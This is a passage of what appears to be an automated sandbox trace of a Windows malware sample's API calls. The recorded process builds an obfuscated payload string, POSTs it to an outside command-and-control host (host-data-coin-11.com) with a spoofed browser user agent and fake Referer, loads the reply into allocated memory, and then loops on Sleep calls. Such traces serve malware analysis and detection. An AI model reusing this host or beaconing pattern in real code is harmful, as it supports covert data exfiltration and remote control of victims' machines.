Seed=0x27a0e9e) returned 0x5fdd973f [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2944682e [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2681dbd [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf1fe548 [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x685756fc [0144.835] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x547cd1c8 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x51f1f065 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x674cd382 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2271c27b [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b65a278 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ed753b5 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf393fa8 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x189952bb [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x60e57d85 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x29dbe1fd [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x45382e9a [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x45b2e6d5 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x123eade5 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5c9a610a [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b37155a [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x536498e7 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1e3f4bc8 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77282bb3 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x75885961 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x27126488 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xbd1cdb2 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x36e3c602 [0144.836] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x296117d9 [0144.836] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0xdd) returned 0x9a80340 [0144.836] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0144.836] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0144.836] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0144.836] lstrcatA (in: lpString1="", lpString2="aU\"mCO++h59jF5%XpfmQ'(gs0))',\"Gxh1FyLj`H2H)*r#A4xh#TV2Oq7RO$8QHVShILx7ZrJQ]/Nfh!?mdN`;eT:Ceut.oF6Y-EXx7#O&C*A%_$g\\w2ohj`gNnGC,)64)o1$" | out: lpString1="aU\"mCO++h59jF5%XpfmQ'(gs0))',\"Gxh1FyLj`H2H)*r#A4xh#TV2Oq7RO$8QHVShILx7ZrJQ]/Nfh!?mdN`;eT:Ceut.oF6Y-EXx7#O&C*A%_$g\\w2ohj`gNnGC,)64)o1$") returned="aU\"mCO++h59jF5%XpfmQ'(gs0))',\"Gxh1FyLj`H2H)*r#A4xh#TV2Oq7RO$8QHVShILx7ZrJQ]/Nfh!?mdN`;eT:Ceut.oF6Y-EXx7#O&C*A%_$g\\w2ohj`gNnGC,)64)o1$" [0144.836] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10c) returned 0x9a80430 [0144.836] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0144.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x97d2300, cbMultiByte=30, lpWideCharStr=0x9a80430, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0144.837] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x75df3c8 | out: pProxyConfig=0x75df3c8) returned 1 [0144.909] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3ea9ba0 [0144.909] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x75df480 | out: lpUrlComponents=0x75df480) returned 1 [0144.909] WinHttpConnect (hSession=0x3ea9ba0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3fa9e40 [0144.909] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a80550 [0144.910] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x68) returned 0x9a80570 [0144.910] WinHttpOpenRequest (hConnect=0x3fa9e40, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x3eeb880 [0144.910] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x4e) returned 0x9a805e0 [0144.910] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10d) returned 0x9a80640 [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2237ef28 [0144.910] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a80760 [0144.910] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x17) returned 0x9a80780 [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x37b17783 [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78469f0e [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x44809d13 [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x196bc4c0 [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x786947c6 [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2cd518df [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x141faab2 [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf16661 [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x409123e9 [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x14c0bbd1 [0144.910] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7febf785 [0144.910] wsprintfW (in: param_1=0x9a80640, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://ihuyojkmnh.net/") returned 44 [0144.910] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80780) returned 0x17 [0144.910] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80780) returned 1 [0144.910] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80760) returned 0x12 [0144.910] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80760) returned 1 [0144.910] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a805e0) returned 0x4e [0144.911] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a805e0) returned 1 [0144.911] WinHttpAddRequestHeaders (hRequest=0x3eeb880, pwszHeaders="Accept: */*\r\nReferer: http://ihuyojkmnh.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0144.911] WinHttpSendRequest (hRequest=0x3eeb880, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9a80340*, dwOptionalLength=0xd4, dwTotalLength=0xd4, dwContext=0x0) returned 1 [0148.191] WinHttpReceiveResponse (hRequest=0x3eeb880, lpReserved=0x0) returned 1 [0148.191] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x2800) returned 0x97d4370 [0148.191] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97d4370, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df538 | out: lpBuffer=0x97d4370*, lpdwNumberOfBytesRead=0x75df538*=0x199) returned 1 [0148.192] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97d4370, Size=0x5000) returned 0x97d4370 [0148.192] WinHttpReadData (in: hRequest=0x3eeb880, lpBuffer=0x97d4509, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df538 | out: lpBuffer=0x97d4509*, lpdwNumberOfBytesRead=0x75df538*=0x0) returned 1 [0148.193] VirtualAlloc (lpAddress=0x0, dwSize=0x199, flAllocationType=0x3000, flProtect=0x4) returned 0x2430000 [0148.194] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d4370) returned 1 [0148.195] WinHttpCloseHandle (hInternet=0x3eeb880) returned 1 [0148.195] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80640) returned 0x10d [0148.195] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80640) returned 1 [0148.195] WinHttpCloseHandle (hInternet=0x3fa9e40) returned 1 [0148.195] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80570) returned 0x68 [0148.195] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80570) returned 1 [0148.195] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80550) returned 0x12 [0148.195] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80550) returned 1 [0148.195] WinHttpCloseHandle (hInternet=0x3ea9ba0) returned 1 [0148.196] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80430) returned 0x10c [0148.196] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80430) returned 1 [0148.196] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a802a0) returned 0x8e [0148.197] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a802a0) returned 1 [0148.197] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80340) returned 0xdd [0148.197] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80340) returned 1 [0148.197] VirtualFree (lpAddress=0x2430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.199] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80080) returned 0x210 [0148.199] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80080) returned 1 [0148.199] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d3360) returned 0x1008 [0148.200] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d3360) returned 1 [0148.200] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2350) returned 0x1008 [0148.200] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2350) returned 1 [0148.200] VirtualFree (lpAddress=0x38d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.201] VirtualFree (lpAddress=0x38c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.203] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x97d2300) returned 0x26 [0148.203] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x97d2300) returned 1 [0148.204] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0148.204] Sleep (dwMilliseconds=0x258) [0148.915] Sleep (dwMilliseconds=0x258) [0150.833] Sleep (dwMilliseconds=0x258) [0151.503] Sleep (dwMilliseconds=0x258) [0152.112] Sleep (dwMilliseconds=0x258) [0152.860] Sleep (dwMilliseconds=0x258) [0153.704] Sleep (dwMilliseconds=0x258) [0154.545] Sleep (dwMilliseconds=0x258) [0155.297] Sleep (dwMilliseconds=0x258) [0156.194] Sleep (dwMilliseconds=0x258) [0158.401] Sleep (dwMilliseconds=0x258) [0159.463] Sleep (dwMilliseconds=0x258) [0160.317] Sleep (dwMilliseconds=0x258) [0161.862] Sleep (dwMilliseconds=0x258) [0162.720] Sleep (dwMilliseconds=0x258) [0165.387] Sleep (dwMilliseconds=0x258) [0166.133] Sleep (dwMilliseconds=0x258) [0166.746] Sleep (dwMilliseconds=0x258) [0166.770] Sleep (dwMilliseconds=0x258) [0166.776] Sleep (dwMilliseconds=0x258) [0166.791] Sleep (dwMilliseconds=0x258) [0166.812] Sleep (dwMilliseconds=0x258) [0166.838] Sleep (dwMilliseconds=0x258) [0166.886] Sleep (dwMilliseconds=0x258) [0166.978] Sleep (dwMilliseconds=0x258) [0167.041] Sleep (dwMilliseconds=0x258) [0167.057] Sleep (dwMilliseconds=0x258) [0167.072] Sleep (dwMilliseconds=0x258) [0167.088] Sleep (dwMilliseconds=0x258) [0167.150] Sleep (dwMilliseconds=0x258) [0167.192] Sleep (dwMilliseconds=0x258) [0167.201] Sleep (dwMilliseconds=0x258) [0167.215] Sleep (dwMilliseconds=0x258) [0167.228] Sleep (dwMilliseconds=0x258) [0167.251] Sleep (dwMilliseconds=0x258) [0167.259] Sleep (dwMilliseconds=0x258) [0167.275] Sleep (dwMilliseconds=0x258) [0167.337] Sleep (dwMilliseconds=0x258) [0167.366] Sleep (dwMilliseconds=0x258) [0167.371] Sleep (dwMilliseconds=0x258) [0167.390] Sleep (dwMilliseconds=0x258) [0167.529] Sleep (dwMilliseconds=0x258) [0167.550] Sleep (dwMilliseconds=0x258) [0167.556] Sleep (dwMilliseconds=0x258) [0167.572] Sleep (dwMilliseconds=0x258) [0167.635] Sleep (dwMilliseconds=0x258) [0167.662] Sleep (dwMilliseconds=0x258) [0167.666] Sleep (dwMilliseconds=0x258) [0167.682] Sleep (dwMilliseconds=0x258) [0167.703] Sleep (dwMilliseconds=0x258) [0167.716] Sleep (dwMilliseconds=0x258) [0167.728] Sleep (dwMilliseconds=0x258) [0167.769] Sleep (dwMilliseconds=0x258) [0167.824] Sleep (dwMilliseconds=0x258) [0167.860] Sleep (dwMilliseconds=0x258) [0167.868] Sleep (dwMilliseconds=0x258) [0167.886] Sleep (dwMilliseconds=0x258) [0167.899] Sleep (dwMilliseconds=0x258) [0167.919] Sleep (dwMilliseconds=0x258) [0167.937] Sleep (dwMilliseconds=0x258) [0167.970] Sleep (dwMilliseconds=0x258) [0168.013] Sleep (dwMilliseconds=0x258) [0168.045] Sleep (dwMilliseconds=0x258) [0168.086] Sleep (dwMilliseconds=0x258) [0168.164] Sleep (dwMilliseconds=0x258) [0168.220] Sleep (dwMilliseconds=0x258) [0168.246] Sleep (dwMilliseconds=0x258) [0168.258] Sleep (dwMilliseconds=0x258) [0168.274] Sleep (dwMilliseconds=0x258) [0168.308] Sleep (dwMilliseconds=0x258) [0168.351] Sleep (dwMilliseconds=0x258) [0168.427] Sleep (dwMilliseconds=0x258) [0168.454] Sleep (dwMilliseconds=0x258) [0168.461] Sleep (dwMilliseconds=0x258) [0168.494] Sleep (dwMilliseconds=0x258) [0168.529] Sleep (dwMilliseconds=0x258) [0168.556] Sleep (dwMilliseconds=0x258) [0168.614] Sleep (dwMilliseconds=0x258) [0168.679] Sleep (dwMilliseconds=0x258) [0168.720] Sleep (dwMilliseconds=0x258) [0168.827] Sleep (dwMilliseconds=0x258) [0168.873] Sleep (dwMilliseconds=0x258) [0168.929] Sleep (dwMilliseconds=0x258) [0168.946] Sleep (dwMilliseconds=0x258) [0168.960] Sleep (dwMilliseconds=0x258) [0168.976] Sleep (dwMilliseconds=0x258) [0169.023] Sleep (dwMilliseconds=0x258) [0169.079] Sleep (dwMilliseconds=0x258) [0169.108] Sleep (dwMilliseconds=0x258) [0169.147] Sleep (dwMilliseconds=0x258) [0169.191] Sleep (dwMilliseconds=0x258) [0169.225] Sleep (dwMilliseconds=0x258) [0169.304] Sleep (dwMilliseconds=0x258) [0169.324] Sleep (dwMilliseconds=0x258) [0169.334] Sleep (dwMilliseconds=0x258) [0169.381] Sleep (dwMilliseconds=0x258) [0169.397] Sleep (dwMilliseconds=0x258) [0169.413] Sleep (dwMilliseconds=0x258) [0169.475] Sleep (dwMilliseconds=0x258) [0169.490] Sleep (dwMilliseconds=0x258) [0169.537] Sleep (dwMilliseconds=0x258) [0169.585] Sleep (dwMilliseconds=0x258) [0169.677] Sleep (dwMilliseconds=0x258) [0169.703] Sleep (dwMilliseconds=0x258) [0169.708] Sleep (dwMilliseconds=0x258) [0169.724] Sleep (dwMilliseconds=0x258) [0169.739] Sleep (dwMilliseconds=0x258) [0169.755] Sleep (dwMilliseconds=0x258) [0169.770] Sleep (dwMilliseconds=0x258) [0169.786] Sleep (dwMilliseconds=0x258) [0169.849] Sleep (dwMilliseconds=0x258) [0169.867] Sleep (dwMilliseconds=0x258) [0169.880] Sleep (dwMilliseconds=0x258) [0169.914] Sleep (dwMilliseconds=0x258) [0169.927] Sleep (dwMilliseconds=0x258) [0169.943] Sleep (dwMilliseconds=0x258) [0169.958] Sleep (dwMilliseconds=0x258) [0170.021] Sleep (dwMilliseconds=0x258) [0170.049] Sleep (dwMilliseconds=0x258) [0170.072] Sleep (dwMilliseconds=0x258) [0170.084] Sleep (dwMilliseconds=0x258) [0170.115] Sleep (dwMilliseconds=0x258) [0170.143] Sleep (dwMilliseconds=0x258) [0170.194] Sleep (dwMilliseconds=0x258) [0170.235] Sleep (dwMilliseconds=0x258) [0170.239] Sleep (dwMilliseconds=0x258) [0170.254] Sleep (dwMilliseconds=0x258) [0170.270] Sleep (dwMilliseconds=0x258) [0170.303] Sleep (dwMilliseconds=0x258) [0170.317] Sleep (dwMilliseconds=0x258) [0170.379] Sleep (dwMilliseconds=0x258) [0170.397] Sleep (dwMilliseconds=0x258) [0170.412] Sleep (dwMilliseconds=0x258) [0170.426] Sleep (dwMilliseconds=0x258) [0170.443] Sleep (dwMilliseconds=0x258) [0170.457] Sleep (dwMilliseconds=0x258) [0170.473] Sleep (dwMilliseconds=0x258) [0170.488] Sleep (dwMilliseconds=0x258) [0170.551] Sleep (dwMilliseconds=0x258) [0170.566] Sleep (dwMilliseconds=0x258) [0170.582] Sleep (dwMilliseconds=0x258) [0170.597] Sleep (dwMilliseconds=0x258) [0170.614] Sleep (dwMilliseconds=0x258) [0170.629] Sleep (dwMilliseconds=0x258) [0170.644] Sleep (dwMilliseconds=0x258) [0170.707] Sleep (dwMilliseconds=0x258) [0170.722] Sleep (dwMilliseconds=0x258) [0170.739] Sleep (dwMilliseconds=0x258) [0170.754] Sleep (dwMilliseconds=0x258) [0170.771] Sleep (dwMilliseconds=0x258) [0170.786] Sleep (dwMilliseconds=0x258) [0170.800] Sleep (dwMilliseconds=0x258) [0170.864] Sleep (dwMilliseconds=0x258) [0170.926] Sleep (dwMilliseconds=0x258) [0170.950] Sleep (dwMilliseconds=0x258) [0170.956] Sleep (dwMilliseconds=0x258) [0170.996] Sleep (dwMilliseconds=0x258) [0171.035] Sleep (dwMilliseconds=0x258) [0171.066] Sleep (dwMilliseconds=0x258) [0171.082] Sleep (dwMilliseconds=0x258) [0171.097] Sleep (dwMilliseconds=0x258) [0171.112] Sleep (dwMilliseconds=0x258) [0171.128] Sleep (dwMilliseconds=0x258) [0171.144] Sleep (dwMilliseconds=0x258) [0171.206] Sleep (dwMilliseconds=0x258) [0171.240] Sleep (dwMilliseconds=0x258) [0171.253] Sleep (dwMilliseconds=0x258) [0171.268] Sleep (dwMilliseconds=0x258) [0171.305] Sleep (dwMilliseconds=0x258) [0171.315] Sleep (dwMilliseconds=0x258) [0171.331] Sleep (dwMilliseconds=0x258) [0171.394] Sleep (dwMilliseconds=0x258) [0171.418] Sleep (dwMilliseconds=0x258) [0171.424] Sleep (dwMilliseconds=0x258) [0171.440] Sleep (dwMilliseconds=0x258) [0171.456] Sleep (dwMilliseconds=0x258) [0171.471] Sleep (dwMilliseconds=0x258) [0171.488] Sleep (dwMilliseconds=0x258) [0171.503] Sleep (dwMilliseconds=0x258) [0171.567] Sleep (dwMilliseconds=0x258) [0171.591] Sleep (dwMilliseconds=0x258) [0171.615] Sleep (dwMilliseconds=0x258) [0171.628] Sleep (dwMilliseconds=0x258) [0171.644] Sleep (dwMilliseconds=0x258) [0171.658] Sleep (dwMilliseconds=0x258) [0171.674] Sleep (dwMilliseconds=0x258) [0171.737] Sleep (dwMilliseconds=0x258) [0171.757] Sleep (dwMilliseconds=0x258) [0171.767] Sleep (dwMilliseconds=0x258) [0171.783] Sleep (dwMilliseconds=0x258) [0171.800] Sleep (dwMilliseconds=0x258) [0171.814] Sleep (dwMilliseconds=0x258) [0171.832] Sleep (dwMilliseconds=0x258) [0171.848] Sleep (dwMilliseconds=0x258) [0171.916] Sleep (dwMilliseconds=0x258) [0171.930] Sleep (dwMilliseconds=0x258) [0171.939] Sleep (dwMilliseconds=0x258) [0171.955] Sleep (dwMilliseconds=0x258) [0171.970] Sleep (dwMilliseconds=0x258) [0171.986] Sleep (dwMilliseconds=0x258) [0172.005] Sleep (dwMilliseconds=0x258) [0172.020] Sleep (dwMilliseconds=0x258) [0172.080] Sleep (dwMilliseconds=0x258) [0172.108] Sleep (dwMilliseconds=0x258) [0172.121] Sleep (dwMilliseconds=0x258) [0172.133] Sleep (dwMilliseconds=0x258) [0172.143] Sleep (dwMilliseconds=0x258) [0172.158] Sleep (dwMilliseconds=0x258) [0172.189] Sleep (dwMilliseconds=0x258) [0172.297] Sleep (dwMilliseconds=0x258) [0172.330] Sleep (dwMilliseconds=0x258) [0172.345] Sleep (dwMilliseconds=0x258) [0172.360] Sleep (dwMilliseconds=0x258) [0172.392] Sleep (dwMilliseconds=0x258) [0172.407] Sleep (dwMilliseconds=0x258) [0172.423] Sleep (dwMilliseconds=0x258) [0172.485] Sleep (dwMilliseconds=0x258) [0172.515] Sleep (dwMilliseconds=0x258) [0172.517] Sleep (dwMilliseconds=0x258) [0172.532] Sleep (dwMilliseconds=0x258) [0172.552] Sleep (dwMilliseconds=0x258) [0172.563] Sleep (dwMilliseconds=0x258) [0172.583] Sleep (dwMilliseconds=0x258) [0172.604] Sleep (dwMilliseconds=0x258) [0172.781] Sleep (dwMilliseconds=0x258) [0172.961] Sleep (dwMilliseconds=0x258) [0172.995] Sleep (dwMilliseconds=0x258) [0173.002] Sleep (dwMilliseconds=0x258) [0173.016] Sleep (dwMilliseconds=0x258) [0173.033] Sleep (dwMilliseconds=0x258) [0173.156] Sleep (dwMilliseconds=0x258) [0173.175] Sleep (dwMilliseconds=0x258) [0173.189] Sleep (dwMilliseconds=0x258) [0173.212] Sleep (dwMilliseconds=0x258) [0173.219] Sleep (dwMilliseconds=0x258) [0173.238] Sleep (dwMilliseconds=0x258) [0173.251] Sleep (dwMilliseconds=0x258) [0173.313] Sleep (dwMilliseconds=0x258) [0173.345] Sleep (dwMilliseconds=0x258) [0173.362] Sleep (dwMilliseconds=0x258) [0173.381] Sleep (dwMilliseconds=0x258) [0173.407] Sleep (dwMilliseconds=0x258) [0173.421] Sleep (dwMilliseconds=0x258) [0173.484] Sleep (dwMilliseconds=0x258) [0173.509] Sleep (dwMilliseconds=0x258) [0173.517] Sleep (dwMilliseconds=0x258) [0173.530] Sleep (dwMilliseconds=0x258) [0173.690] Sleep (dwMilliseconds=0x258) [0173.720] Sleep (dwMilliseconds=0x258) [0173.749] Sleep (dwMilliseconds=0x258) [0173.842] Sleep (dwMilliseconds=0x258) [0173.964] Sleep (dwMilliseconds=0x258) [0173.984] Sleep (dwMilliseconds=0x258) [0174.001] Sleep (dwMilliseconds=0x258) [0174.015] Sleep (dwMilliseconds=0x258) [0174.092] Sleep (dwMilliseconds=0x258) [0174.128] Sleep (dwMilliseconds=0x258) [0174.147] Sleep (dwMilliseconds=0x258) [0174.154] Sleep (dwMilliseconds=0x258) [0174.174] Sleep (dwMilliseconds=0x258) [0174.190] Sleep (dwMilliseconds=0x258) [0174.207] Sleep (dwMilliseconds=0x258) [0174.264] Sleep (dwMilliseconds=0x258) [0174.316] Sleep (dwMilliseconds=0x258) [0174.326] Sleep (dwMilliseconds=0x258) [0174.342] Sleep (dwMilliseconds=0x258) [0174.362] Sleep (dwMilliseconds=0x258) [0174.373] Sleep (dwMilliseconds=0x258) [0174.391] Sleep (dwMilliseconds=0x258) [0174.406] Sleep (dwMilliseconds=0x258) [0174.466] Sleep (dwMilliseconds=0x258) [0174.498] Sleep (dwMilliseconds=0x258) [0174.514] Sleep (dwMilliseconds=0x258) [0174.529] Sleep (dwMilliseconds=0x258) [0174.544] Sleep (dwMilliseconds=0x258) [0174.576] Sleep (dwMilliseconds=0x258) [0174.638] Sleep (dwMilliseconds=0x258) [0174.672] Sleep (dwMilliseconds=0x258) [0174.685] Sleep (dwMilliseconds=0x258) [0174.707] Sleep (dwMilliseconds=0x258) [0174.717] Sleep (dwMilliseconds=0x258) [0174.735] Sleep (dwMilliseconds=0x258) [0174.749] Sleep (dwMilliseconds=0x258) [0174.763] Sleep (dwMilliseconds=0x258) [0174.841] Sleep (dwMilliseconds=0x258) [0174.875] Sleep (dwMilliseconds=0x258) [0174.887] Sleep (dwMilliseconds=0x258) [0174.904] Sleep (dwMilliseconds=0x258) [0174.919] Sleep (dwMilliseconds=0x258) [0174.935] Sleep (dwMilliseconds=0x258) [0174.964] Sleep (dwMilliseconds=0x258) [0175.013] Sleep (dwMilliseconds=0x258) [0175.035] Sleep (dwMilliseconds=0x258) [0175.062] Sleep (dwMilliseconds=0x258) [0175.108] Sleep (dwMilliseconds=0x258) [0175.153] Sleep (dwMilliseconds=0x258) [0175.207] Sleep (dwMilliseconds=0x258) [0175.223] Sleep (dwMilliseconds=0x258) [0175.231] Sleep (dwMilliseconds=0x258) [0175.263] Sleep (dwMilliseconds=0x258) [0175.288] Sleep (dwMilliseconds=0x258) [0175.293] Sleep (dwMilliseconds=0x258) [0175.309] Sleep (dwMilliseconds=0x258) [0175.373] Sleep (dwMilliseconds=0x258) [0175.404] Sleep (dwMilliseconds=0x258) [0175.418] Sleep (dwMilliseconds=0x258) [0175.435] Sleep (dwMilliseconds=0x258) [0175.451] Sleep (dwMilliseconds=0x258) [0175.466] Sleep (dwMilliseconds=0x258) [0175.481] Sleep (dwMilliseconds=0x258) [0175.511] Sleep (dwMilliseconds=0x258) [0175.612] Sleep (dwMilliseconds=0x258) [0175.623] Sleep (dwMilliseconds=0x258) [0175.667] Sleep (dwMilliseconds=0x258) [0175.685] Sleep (dwMilliseconds=0x258) [0175.699] Sleep (dwMilliseconds=0x258) [0175.714] Sleep (dwMilliseconds=0x258) [0175.777] Sleep (dwMilliseconds=0x258) [0175.822] Sleep (dwMilliseconds=0x258) [0175.824] Sleep (dwMilliseconds=0x258) [0175.841] Sleep (dwMilliseconds=0x258) [0175.855] Sleep (dwMilliseconds=0x258) [0175.870] Sleep (dwMilliseconds=0x258) [0175.933] Sleep (dwMilliseconds=0x258) [0175.951] Sleep (dwMilliseconds=0x258) [0175.970] Sleep (dwMilliseconds=0x258) [0175.983] Sleep (dwMilliseconds=0x258) [0175.995] Sleep (dwMilliseconds=0x258) [0176.018] Sleep (dwMilliseconds=0x258) [0176.026] Sleep (dwMilliseconds=0x258) [0176.090] Sleep (dwMilliseconds=0x258) [0176.124] Sleep (dwMilliseconds=0x258) [0176.141] Sleep (dwMilliseconds=0x258) [0176.154] Sleep (dwMilliseconds=0x258) [0176.177] Sleep (dwMilliseconds=0x258) [0176.190] Sleep (dwMilliseconds=0x258) [0176.199] Sleep 